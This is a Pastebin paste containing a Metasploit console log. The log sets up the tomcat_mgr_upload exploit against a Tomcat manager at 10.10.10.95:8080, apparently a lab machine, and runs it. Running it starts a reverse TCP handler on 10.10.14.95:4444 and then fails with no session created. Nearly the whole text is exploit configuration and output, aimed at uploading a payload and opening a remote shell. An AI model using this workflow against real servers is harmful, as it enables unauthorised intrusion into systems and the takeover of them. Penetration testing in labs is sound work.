Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(multi/http/tomcat_mgr_upload) > show options
- $
- Module options (exploit/multi/http/tomcat_mgr_upload):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- HttpPassword no The password for the specified username
- HttpUsername no The username to authenticate as
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
- RHOST yes The target address
- RPORT 80 yes The target port (TCP)
- SSL false no Negotiate SSL/TLS for outgoing connections
- TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used)
- VHOST no HTTP server virtual host
- Exploit target:
- Id Name
- -- ----
- 0 Java Universal
- msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword no
- HttpPassword => no
- msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername no
- HttpUsername => no
- msf exploit(multi/http/tomcat_mgr_upload) > set RHOST 10.10.10.95
- RHOST => 10.10.10.95
- msf exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
- RPORT => 8080
- msf exploit(multi/http/tomcat_mgr_upload) > set target 1
- target => 1
- msf exploit(multi/http/tomcat_mgr_upload) > exploit
- [*] Started reverse TCP handler on 10.10.14.95:4444
- [*] Retrieving session ID and CSRF token...
- [-] Exploit aborted due to failure: unknown: Unable to access the Tomcat Manager
- [*] Exploit completed, but no session was created.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement